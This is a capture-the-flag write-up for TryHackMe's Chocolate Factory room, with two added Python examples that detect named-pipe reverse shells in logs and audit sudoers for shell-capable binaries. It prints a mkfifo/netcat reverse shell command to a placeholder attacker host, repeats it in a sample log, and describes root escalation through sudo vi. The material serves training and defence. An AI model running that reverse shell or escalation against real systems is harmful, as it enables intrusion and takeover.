TryHackMe write-up: Chocolate Factory

Introduction

This is my write-up for TryHackMe’s Chocolate Factory room.

Enumeration

Using nmap, I found that this box had several ports open.

Checking the webpage, I found what looked like a login page.

Running nmap’s service enumeration option, I saw something interesting for port 113.

It turns out that a file named key_rev_key is being hosted on the web site. Downloading it and opening it in Ghidra, I was able to read the code and find the key being asked for.

Running dirb, I found a php page.

From my browser, I checked the php page. It looked like it was used to execute commands!

Exploitation

I sent the command “ls -lhtra” to see if this page would run simple commands.

I then tried sending the following command:

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc [Attacker IP] [Attacker port] >/tmp/f

I then checked my netcat listener, and found a connection from the target.
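From the defender's side, the command above has a recognisable shape: a FIFO created with mkfifo, an interactive shell, and a network client tied together in one command line. The following is an added example (not part of the original write-up) showing how that shape can be flagged in a command-audit feed. The log format and the sample lines are constructed for this example; the callback address 10.0.0.5:4444 stands in for the write-up's "[Attacker IP] [Attacker port]" placeholders.

```python
"""Flag named-pipe reverse shells in command-execution logs (added example)."""
import re
from typing import Dict, List, Optional, Set, Tuple

# Constructed sample log lines for this example (not real data). The format
# mimics a command-audit feed that records the user and the full command.
SAMPLE_LOG = [
    "2021-09-16T10:01:02 host=web01 user=www-data cmd='ls -lhtra'",
    "2021-09-16T10:01:45 host=web01 user=www-data cmd='rm /tmp/f;mkfifo /tmp/f;"
    "cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.5 4444 >/tmp/f'",
    "2021-09-16T10:02:10 host=web01 user=charlie cmd='sudo vi /etc/hosts'",
    "2021-09-16T10:03:00 host=web01 user=app cmd='mkfifo /var/lib/app/events.pipe'",
]

LOG_RE = re.compile(r"user=(?P<user>\S+)\s+cmd='(?P<cmd>.*)'\s*$")

# Each indicator on its own is benign (mkfifo is used by legitimate software);
# it is the combination within a single command that is suspicious.
INDICATORS = {
    "named_pipe": re.compile(r"\bmkfifo\b"),
    "interactive_shell": re.compile(r"\b(?:ba|z|da)?sh\s+-i\b"),
    "network_client": re.compile(r"\b(?:nc|ncat|netcat)\b[^|;]*?\s\d{1,5}\b|/dev/tcp/"),
    "stderr_merged": re.compile(r"2>&1"),
}

# Extracts HOST PORT from the plain "nc HOST PORT" form used in the write-up.
CALLBACK_RE = re.compile(
    r"\b(?:nc|ncat|netcat)\b(?:\s+-\S+)*\s+(?P<host>[\w.\-]+)\s+(?P<port>\d{1,5})\b"
)


def indicators_for(cmd: str) -> Set[str]:
    """Return the names of all indicators present in one command string."""
    return {name for name, rx in INDICATORS.items() if rx.search(cmd)}


def is_reverse_shell(cmd: str) -> bool:
    """A shell (interactive or fed from a FIFO) wired to a network client."""
    hits = indicators_for(cmd)
    return "network_client" in hits and (
        "interactive_shell" in hits or "named_pipe" in hits
    )


def extract_callback(cmd: str) -> Optional[Tuple[str, int]]:
    """Pull the remote host and port out of the netcat invocation, if present."""
    m = CALLBACK_RE.search(cmd)
    if not m:
        return None
    return m.group("host"), int(m.group("port"))


def scan_log(lines: List[str]) -> List[Dict]:
    """Return one finding per log line whose command looks like a reverse shell."""
    findings = []
    for line in lines:
        m = LOG_RE.search(line)
        if not m:
            continue
        cmd = m.group("cmd")
        if is_reverse_shell(cmd):
            findings.append({
                "user": m.group("user"),
                "cmd": cmd,
                "indicators": sorted(indicators_for(cmd)),
                "callback": extract_callback(cmd),
            })
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"user={f['user']} callback={f['callback']} indicators={f['indicators']}")
```

Only the second sample line is flagged: the standalone mkfifo from the app user and charlie's sudo vi do not combine a shell with a network client. The callback tuple gives the analyst the address to look for in firewall or flow logs.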

Checking the contents of the directory, I found another php file containing a possible set of credentials.

Trying to run su or ssh as this user proved futile. It seems that I needed to escalate privileges another way.

Privilege Escalation

Checking out charlie’s home directory showed what looked like an ssh private key.

Downloading the private key, I was able to connect to the target via ssh as charlie.

Checking for sudo privileges, I found that the user charlie can execute vi as root. GTFOBins has a lot of examples showing how to get root using vi.
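The mitigation side of this step is an audit of sudoers for entries that grant a binary capable of spawning a shell. Below is an added example (not from the room or the write-up) that parses sudoers-style rules and flags the kind of entry charlie had. The sudoers content and the user names are constructed; the list of shell-capable binaries is a small selection of the programs GTFOBins documents, not a complete one.

```python
"""Audit sudoers rules for shell-capable binaries granted as root (added example)."""
import os
import re
import shlex
from typing import Dict, List, Optional, Set, Tuple

# Constructed sample sudoers content for this example (not from the room).
SUDOERS_SAMPLE = """\
Defaults        env_reset
root    ALL=(ALL:ALL) ALL
%admin  ALL=(ALL) ALL
charlie ALL=(ALL) NOPASSWD: /usr/bin/vi
backup  ALL=(root) NOPASSWD: /usr/bin/rsync -a /srv /mnt/backup
deploy  ALL=(root) NOPASSWD: /bin/systemctl restart app.service
"""

# Programs that offer an interactive shell or arbitrary command execution once
# running as root. Granting any of them via sudo is equivalent to granting a
# root shell. Partial list, drawn from what GTFOBins documents.
SHELL_CAPABLE = {
    "vi", "vim", "view", "nano", "less", "more", "man", "find", "awk",
    "perl", "python", "python3", "bash", "sh", "env", "ftp", "tar", "zip",
}

RULE_RE = re.compile(
    r"^(?P<who>[%\w.\-+]+)\s+(?P<hosts>[^=\s]+)\s*=\s*"
    r"(?:\((?P<runas>[^)]*)\)\s*)?(?P<body>.*)$"
)
TAG_RE = re.compile(
    r"(?P<tag>NOPASSWD|PASSWD|NOEXEC|EXEC|SETENV|NOSETENV|LOG_INPUT|NOLOG_INPUT|"
    r"LOG_OUTPUT|NOLOG_OUTPUT|MAIL|NOMAIL|FOLLOW|NOFOLLOW):\s*"
)


def _strip_tags(segment: str) -> Tuple[Set[str], str]:
    """Peel leading tags such as NOPASSWD: off one command segment."""
    tags: Set[str] = set()
    while True:
        m = TAG_RE.match(segment)
        if not m:
            return tags, segment.strip()
        tags.add(m.group("tag"))
        segment = segment[m.end():]


def parse_rule(line: str) -> Optional[Dict]:
    """Parse one user specification into who / runas / (tags, command) entries."""
    m = RULE_RE.match(line)
    if not m:
        return None
    entries = []
    for segment in m.group("body").split(","):
        tags, cmd = _strip_tags(segment.strip())
        if cmd:
            entries.append((tags, cmd))
    return {
        "who": m.group("who"),
        "runas": (m.group("runas") or "root").strip(),
        "entries": entries,
    }


def audit_sudoers(text: str) -> List[Dict]:
    """Return findings for non-root principals granted ALL or a shell-capable program."""
    findings = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line or line.startswith(
            ("Defaults", "Cmnd_Alias", "User_Alias", "Host_Alias", "Runas_Alias")
        ):
            continue
        rule = parse_rule(line)
        if rule is None or rule["who"] == "root":
            continue
        for tags, cmd in rule["entries"]:
            if cmd == "ALL":
                reason = "unrestricted: any command as " + rule["runas"]
            else:
                prog = os.path.basename(shlex.split(cmd)[0])
                if prog not in SHELL_CAPABLE:
                    continue
                reason = f"{prog} can spawn a shell (see GTFOBins)"
            findings.append({
                "who": rule["who"], "runas": rule["runas"], "command": cmd,
                "nopasswd": "NOPASSWD" in tags, "reason": reason,
            })
    return findings


if __name__ == "__main__":
    for f in audit_sudoers(SUDOERS_SAMPLE):
        print(f"{f['who']}: {f['command']} (nopasswd={f['nopasswd']}) -> {f['reason']}")
```

On the sample the audit flags %admin (unrestricted) and charlie (vi, without a password), while the rsync and systemctl entries with fixed arguments pass. The fix for an entry like charlie's is to grant the specific task instead, for example a wrapper script with a fixed argument list, rather than an editor.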

Running root.py and then entering the key found in the enumeration phase shows the root flag.

m0ndzon3

I like breaking stuff.